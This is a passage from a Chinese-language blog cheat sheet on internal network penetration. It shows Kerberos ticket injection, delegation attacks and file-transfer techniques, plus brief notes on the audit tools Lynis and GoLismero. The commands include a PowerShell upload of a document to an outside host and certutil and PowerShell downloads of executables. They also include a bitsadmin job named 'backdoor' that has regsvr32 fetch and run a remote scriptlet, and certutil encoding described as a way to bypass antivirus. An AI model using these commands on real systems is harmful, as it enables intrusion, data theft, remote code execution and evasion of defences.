<p><img src="/images/image-20210116105039417.png" alt="image-20210116105039417"></p>
<p>将凭证添注入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kerberos::ptt xxx.kirbi</span><br></pre></td></tr></table></figure>
<p><img src="/images/image-20210116105528377.png" alt="image-20210116105528377"></p>
<h4 id="约束委派攻击"><a href="#约束委派攻击" class="headerlink" title="约束委派攻击"></a>约束委派攻击</h4><p>非约束性委派（Unconstrained Delegation），服务账号可以获取某用户的TGT，<strong>从而服务账号可使用该TGT</strong>，模拟用户访问任意服务</p>
<p>约束性委派，服务账号只能获取用户委派的服务的票据，从而服务账号可使用该票据，只能访问指定的服务</p>
<h2 id="文件传输"><a href="#文件传输" class="headerlink" title="文件传输"></a>文件传输</h2><h3 id="powershell"><a href="#powershell" class="headerlink" title="powershell"></a>powershell</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># 文件上传</span><br><span class="line">powershell (New-Object System.Net.WebClient).UploadFile(&#39;http:&#x2F;&#x2F;10.11.0.4&#x2F;upload.php&#39;, &#39;important.docx&#39;)</span><br><span class="line"></span><br><span class="line"># 文件下载</span><br><span class="line">powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile(&#39;http:&#x2F;&#x2F;192.168.111.1:8080&#x2F;test&#x2F;putty.exe&#39;,&#39;C:\Users\linghuchong\Desktop\Tools\putty1.exe&#39;)</span><br><span class="line">putty1.exe</span><br></pre></td></tr></table></figure>
<h3 id="bitsadmin"><a href="#bitsadmin" class="headerlink" title="bitsadmin"></a>bitsadmin</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bitsadmin &#x2F;transfer n http:&#x2F;&#x2F;domain&#x2F;file c:\windows\temp\shell.exe</span><br></pre></td></tr></table></figure>
<p>此工具还能够用下载并执行后门</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">#创建一个下载任务：</span><br><span class="line">bitsadmin &#x2F;create backdoor</span><br><span class="line">#添加文档：</span><br><span class="line">bitsadmin &#x2F;addfile backdoor %comspec%  %temp%\cmd.exe</span><br><span class="line">#设置下载成功之后要执行的命令：</span><br><span class="line">bitsadmin.exe &#x2F;SetNotifyCmdLine backdoor regsvr32.exe &quot;&#x2F;u &#x2F;s &#x2F;i:https:&#x2F;&#x2F;raw.githubusercontent.com&#x2F;3gstudent&#x2F;SCTPersistence&#x2F;master&#x2F;calc.sct scrobj.dll&quot;</span><br><span class="line">#执行任务：</span><br><span class="line">bitsadmin &#x2F;Resume backdoor</span><br></pre></td></tr></table></figure>


<h3 id="certutil"><a href="#certutil" class="headerlink" title="certutil"></a>certutil</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">certutil.exe -urlcache -split -f http:&#x2F;&#x2F;192.168.111.1:8080&#x2F;test&#x2F;putty.exe</span><br><span class="line">certutil.exe -urlcache -split -f http:&#x2F;&#x2F;192.168.111.1:8080&#x2F;test&#x2F;putty.exe delete  #删除缓存</span><br><span class="line">putty.exe</span><br></pre></td></tr></table></figure>
<p>可以实现绕过杀软</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># 编码要上传的exe到txt格式</span><br><span class="line">CertUtil -encode frpc.exe frpc.txt</span><br><span class="line"># 下载txt文件</span><br><span class="line">certutil.exe -urlcache -split -f frpc.txt的地址</span><br><span class="line"># 将txt文件编码成exe文件</span><br><span class="line">CertUtil -decode frpc.txt frpc.exe</span><br></pre></td></tr></table></figure>
<h3 id="nc"><a href="#nc" class="headerlink" title="nc"></a>nc</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">nc -lvvp 8888 &gt; fileName</span><br><span class="line">nc 1.1.1.1 8888 &lt; fileName</span><br></pre></td></tr></table></figure>
<h2 id="安全审计"><a href="#安全审计" class="headerlink" title="安全审计"></a>安全审计</h2><h3 id="Lynis"><a href="#Lynis" class="headerlink" title="Lynis"></a>Lynis</h3><p><a target="_blank" rel="noopener" href="https://github.com/CISOfy/lynis">Lynis</a>是一款Unix系统的安全审计以及加固工具，能够进行深层次的安全扫描，其目的是检测潜在的时间并对未来的系统加固提供建议。这款软件会扫描一般系统信息，脆弱软件包以及潜在的错误配置。</p>
<h3 id="golismero"><a href="#golismero" class="headerlink" title="golismero"></a>golismero</h3><p>GoLismero是一款开源的安全测试框架。目前，它的测试目标主要为网站。该框架采用插件模式，实现用户所需要的功能。GoLismero默认自带了导入、侦测、扫描、攻击、报告、UI六大类插件。通过这些插件，用户可以对目标网站进行DNS检测、服务识别、GEOIP扫描、Robots文件扫描、目录暴力枚举等几十项功能。通过插件方式，GoLismero还可以调用其他工具，如Exploit-DB、PunkSPIDER、Shodan、SpiderFoot、theHarvester。但已经许久不更新了。</p>

        </div>
        
<blockquote class="copyright">
    <p><strong>Link to this article : </strong><a class="permalink" href="http://example.com/2021/03/02/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">http://example.com/2021/03/02/内网渗透/</a></p>
    <p><strong>This article is available under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener noreferrer">Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0)</a> License</strong></p>
</blockquote>


    </article>
    
    <section id="comments">
        
    </section>


    

</main>


<aside style="" id="sidebar" class="aside aside-fixture">
    <div class="toc-sidebar">
        <nav id="toc" class="article-toc">
            <h3 class="toc-title">Catalogue</h3>
            <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F"><span class="toc-number">1.</span> <span class="toc-text">内网渗透</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%9A%A7%E9%81%93%E3%80%81%E4%BB%A3%E7%90%86%E3%80%81%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91"><span class="toc-number">1.1.</span> <span class="toc-text">隧道、代理、端口转发</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BB%A3%E7%90%86%E4%B8%8E%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91"><span class="toc-number">1.1.1.</span> <span class="toc-text">代理与端口转发</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#proxychains"><span class="toc-number">1.1.1.1.</span> <span class="toc-text">proxychains</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#proxifier"><span class="toc-number">1.1.1.2.</span> <span class="toc-text">proxifier</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Venom"><span class="toc-number">1.1.1.3.</span> <span class="toc-text">Venom</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#IOX"><span class="toc-number">1.1.1.4.</span> <span class="toc-text">IOX</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%9A%A7%E9%81%93%E6%90%AD%E5%BB%BA"><span class="toc-number">1.1.2.</span> <span class="toc-text">隧道搭建</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A4%E6%96%AD%E5%8D%8F%E8%AE%AE%E5%87%BA%E7%BD%91"><span class="toc-number">1.1.2.1.</span> <span class="toc-text">判断协议出网</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%90%AD%E5%BB%BA%E9%9A%A7%E9%81%93"><span class="toc-number">1.1.2.2.</span> <span class="toc-text">搭建隧道</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%B3%E9%97%AD%E7%B3%BB%E7%BB%9F%E6%97%A5%E5%BF%97%E8%AE%B0%E5%BD%95"><span class="toc-number">1.2.</span> <span class="toc-text">关闭系统日志记录</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">1.3.</span> <span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%94%B6%E9%9B%86%E7%94%A8%E6%88%B7%E5%8F%A3%E4%BB%A4"><span class="toc-number">1.4.</span> <span class="toc-text">收集用户口令</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#windows"><span class="toc-number">1.4.0.0.1.</span> <span class="toc-text">windows</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#linux"><span class="toc-number">1.4.0.0.2.</span> <span class="toc-text">linux</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AD%98%E6%B4%BB%E4%B8%BB%E6%9C%BA"><span class="toc-number">1.5.</span> <span class="toc-text">存活主机</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#Windows"><span class="toc-number">1.5.0.0.1.</span> <span class="toc-text">Windows</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#Linux"><span class="toc-number">1.5.0.0.2.</span> <span class="toc-text">Linux</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8F%90%E6%9D%83"><span class="toc-number">1.6.</span> <span class="toc-text">提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Mysql%E6%8F%90%E6%9D%83"><span class="toc-number">1.6.1.</span> <span class="toc-text">Mysql提权</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#UDF%E6%8F%90%E6%9D%83"><span class="toc-number">1.6.1.1.</span> <span class="toc-text">UDF提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Mof%E6%8F%90%E6%9D%83"><span class="toc-number">1.6.1.2.</span> <span class="toc-text">Mof提权</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%9F%E7%8E%AF%E5%A2%83"><span class="toc-number">1.7.</span> <span class="toc-text">域环境</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E5%9F%9F%E6%8E%A7"><span class="toc-number">1.7.1.</span> <span class="toc-text">获取域控</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#ms14-068"><span class="toc-number">1.7.1.1.</span> <span class="toc-text">ms14-068</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#GPP"><span class="toc-number">1.7.1.2.</span> <span class="toc-text">GPP</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#CVE-2020-1472-%E5%9F%9F%E5%86%85%E6%8F%90%E6%9D%83"><span class="toc-number">1.7.1.3.</span> <span class="toc-text">CVE-2020-1472 域内提权</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8"><span class="toc-number">1.7.2.</span> <span class="toc-text">横向移动</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#SPN"><span class="toc-number">1.7.2.1.</span> <span class="toc-text">SPN</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#PTH"><span class="toc-number">1.7.2.2.</span> <span class="toc-text">PTH</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#WMI-%E5%9B%9E%E6%98%BE"><span class="toc-number">1.7.2.3.</span> <span class="toc-text">WMI(回显)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#wmic"><span class="toc-number">1.7.2.4.</span> <span class="toc-text">wmic</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#impackets"><span class="toc-number">1.7.2.5.</span> <span class="toc-text">impackets</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#psexec"><span class="toc-number">1.7.2.6.</span> <span class="toc-text">psexec</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#IPC%E5%88%A9%E7%94%A8"><span class="toc-number">1.7.2.7.</span> <span class="toc-text">IPC利用</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1"><span class="toc-number">1.7.2.8.</span> <span class="toc-text">计划任务</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%90%AF%E5%8A%A8%E6%9C%8D%E5%8A%A1"><span class="toc-number">1.7.2.9.</span> <span class="toc-text">启动服务</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81"><span class="toc-number">1.8.</span> <span class="toc-text">权限维持</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B3%A8%E5%86%8C%E8%A1%A8%E5%90%AF%E5%8A%A8%E9%A1%B9"><span class="toc-number">1.8.1.</span> <span class="toc-text">注册表启动项</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Windows%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1"><span class="toc-number">1.8.2.</span> <span class="toc-text">Windows计划任务</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A4%9A%E5%9C%B0%E7%99%BB%E9%99%86%E7%AE%A1%E7%90%86%E5%91%98%E8%B4%A6%E5%8F%B7"><span class="toc-number">1.8.3.</span> <span class="toc-text">多地登陆管理员账号</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%9A%90%E8%97%8F%E6%96%87%E4%BB%B6"><span class="toc-number">1.8.4.</span> <span class="toc-text">隐藏文件</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E5%B1%9E%E6%80%A7%E9%9A%90%E8%97%8F"><span class="toc-number">1.8.4.1.</span> <span class="toc-text">文件属性隐藏</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A9%E7%94%A8ADS%E9%9A%90%E8%97%8F"><span class="toc-number">1.8.4.2.</span> <span class="toc-text">利用ADS隐藏</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%A9%B1%E5%8A%A8%E7%BA%A7%E6%96%87%E4%BB%B6%E9%9A%90%E8%97%8F"><span class="toc-number">1.8.4.3.</span> <span class="toc-text">驱动级文件隐藏</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SSP-Security-Support-Provider"><span class="toc-number">1.8.5.</span> <span class="toc-text">SSP(Security Support Provider)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE"><span class="toc-number">1.8.6.</span> <span class="toc-text">黄金票据</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE"><span class="toc-number">1.8.7.</span> <span class="toc-text">白银票据</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A3%80%E6%B5%8B%E5%9F%9F%E5%86%85%E5%AF%86%E7%A0%81%E4%BF%AE%E6%94%B9"><span class="toc-number">1.8.8.</span> <span class="toc-text">检测域内密码修改</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Skeleton-Key"><span class="toc-number">1.8.9.</span> <span class="toc-text">Skeleton Key</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%9F%9F%E5%86%85%E5%A7%94%E6%B4%BE%E6%94%BB%E5%87%BB"><span class="toc-number">1.8.10.</span> <span class="toc-text">域内委派攻击</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%9D%9E%E7%BA%A6%E6%9D%9F%E5%A7%94%E6%B4%BE%E6%94%BB%E5%87%BB"><span class="toc-number">1.8.10.1.</span> <span class="toc-text">非约束委派攻击</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%BA%A6%E6%9D%9F%E5%A7%94%E6%B4%BE%E6%94%BB%E5%87%BB"><span class="toc-number">1.8.10.2.</span> <span class="toc-text">约束委派攻击</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%BC%A0%E8%BE%93"><span class="toc-number">1.9.</span> <span class="toc-text">文件传输</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#powershell"><span class="toc-number">1.9.1.</span> <span class="toc-text">powershell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#bitsadmin"><span class="toc-number">1.9.2.</span> <span class="toc-text">bitsadmin</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#certutil"><span class="toc-number">1.9.3.</span> <span class="toc-text">certutil</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#nc"><span class="toc-number">1.9.4.</span> <span class="toc-text">nc</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%89%E5%85%A8%E5%AE%A1%E8%AE%A1"><span class="toc-number">1.10.</span> <span class="toc-text">安全审计</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Lynis"><span class="toc-number">1.10.1.</span> <span class="toc-text">Lynis</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#golismero"><span class="toc-number">1.10.2.</span> <span class="toc-text">golismero</span></a></li></ol></li></ol></li></ol>
        </nav>
    </div>
</aside>





        </section>
        <footer class="hidden lg:block fixed bottom-0 left-0 sm:w-1/12 lg:w-1/6 bg-gray-100 z-40">
    
    <div class="footer-social-links">
        
            <a target="_blank" rel="noopener" href="https://github.com/h00ls">
                <i class="iconfont icon-github"></i>
            </a>
        
            <a href="/atom.xml">
                <i class="iconfont icon-rss"></i>
            </a>
        
    </div>
    
    
</footer>

        <div id="mask" class="hidden mask fixed inset-0 bg-gray-900 opacity-75 z-40"></div>
        <div id="search-view-container" class="hidden shadow-xl"></div>
        
<script src="/js/dom-event.min.js"></script>

<script src="//cdn.jsdelivr.net/npm/yox@1.0.0-alpha.121/dist/standard/prod/yox.min.js"></script>


<script src="/js/search.min.js"></script>



    <script src="//cdn.jsdelivr.net/npm/lightgallery.js@1.1.3/dist/js/lightgallery.min.js"></script>
    
<script src="/js/light-gallery.min.js"></script>





    </body>
</html>
